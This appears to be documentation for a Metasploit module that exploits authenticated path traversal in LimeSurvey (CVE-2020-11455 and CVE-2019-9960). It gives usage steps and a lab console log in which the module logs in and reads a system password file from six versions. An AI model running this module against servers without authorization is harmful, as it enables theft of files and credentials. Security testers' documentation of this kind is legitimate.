5.7 KiB
5.7 KiB
Vulnerable Application
This module exploits an authenticated path traversal vulnerability found in LimeSurvey versions between 4.0 and 4.1.11 with CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960, inclusive.
In CVE-2020-11455 the getZipFile
function within the filemanager
functionality allows for arbitrary file download. The file retrieved
may be deleted after viewing.
In CVE-2019-9960 the szip
function within the downloadZip
functionality allows for arbitrary file download.
This module has been verified against the following versions:
- 4.1.11-200316
- 3.15.0-181008
- 3.9.0-180604
- 3.6.0-180328
- 3.0.0-171222
- 2.70.0-170921
This application is straight forward to install. An excellent writeup is available on howtoforge.com
Versions can be downloaded from github.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use auxiliary/scanner/http/limesurvey_zip_traversals
- Do:
set file [file]
- Do:
set rhosts [ip]
- Do:
- If the file is readable, you should retrieve a file from the application
The file to attempt to retrieve
LimeSurvey 4.1.11, 3.15.0, 3.9.0, 3.6.0, 3.0.0, and 2.70.0 on Ubuntu 18.04
[*] Processing lime41.rb for ERB directives.
resource (lime41.rb)> use auxiliary/scanner/http/limesurvey_zip_traversals
resource (lime41.rb)> set rhosts
rhosts =>
resource (lime41.rb)> set verbose true
verbose => true
resource (lime41.rb)> set targeturi /LimeSurvey-4.1.11-200316/
targeturi => /LimeSurvey-4.1.11-200316/
resource (lime41.rb)> run
[*] CSRF: YII_CSRF_TOKEN => SzF-eUl4RW1lU0h-aFZxWmNwbGZOREJrYUduZzI1WTaGH7eqrOmgcse5liKfPNZ8qqKkvenm5Fu6oxTSyVWDrQ==
[+] Login Successful
[*] Version Detected: 4.1.11
[*] Attempting to retrieve file
[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (lime41.rb)> set targeturi /LimeSurvey-3.15.0-181008/
targeturi => /LimeSurvey-3.15.0-181008/
resource (lime41.rb)> run
[+] Login Successful
[*] Version Detected: 3.15.0
[*] Attempting to retrieve file
[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (lime41.rb)> set targeturi /LimeSurvey-3.9.0-180604/
targeturi => /LimeSurvey-3.9.0-180604/
resource (lime41.rb)> run
[*] CSRF: YII_CSRF_TOKEN => QldPa0lZM0o0cUV-STU4NWVoYVlDdHNtYmhmVVl6NW39a1wvfep0Ccsuz_gx9V1AnMjtADnprALM7qwvxUz3Wg==
[+] Login Successful
[*] Version Detected: 3.9.0
[*] Attempting to retrieve file
[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (lime41.rb)> set targeturi /LimeSurvey-3.6.0-180328/
targeturi => /LimeSurvey-3.6.0-180328/
resource (lime41.rb)> run
[+] Login Successful
[*] Version Detected: 3.6.0
[*] Attempting to retrieve file
[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (lime41.rb)> set targeturi /LimeSurvey-3.0.0-171222/
targeturi => /LimeSurvey-3.0.0-171222/
resource (lime41.rb)> run
[*] CSRF: YII_CSRF_TOKEN => T1VkbDlhYU9IbkZHel9wd0JoVVl5RTUxQ2h2Mk9yN0-AXAtaTDCOMX8gWru7EmBHPBumgY0FG0vAFLwCwyeeuA==
[+] Login Successful
[*] Version Detected: 3.0.0
[*] Attempting to retrieve file
[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (lime41.rb)> set targeturi /LimeSurvey-2.70.0-170921/
targeturi => /LimeSurvey-2.70.0-170921/
resource (lime41.rb)> run
[*] CSRF: YII_CSRF_TOKEN => elhvTzJaWGlJWU10WnBFajlTYmN5a1VHY1M0bDNJd1C2okYXL__0in7KMlmwY6_Iuk8sI7H7s2zQPZ5NiWW_Xg==
[+] Login Successful
[*] Version Detected: 2.70.0
[*] Attempting to retrieve file
[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (lime41.rb)> md5sum ~/.msf4/loot/*
[*] exec: md5sum ~/.msf4/loot/*
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
[*] exec: cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false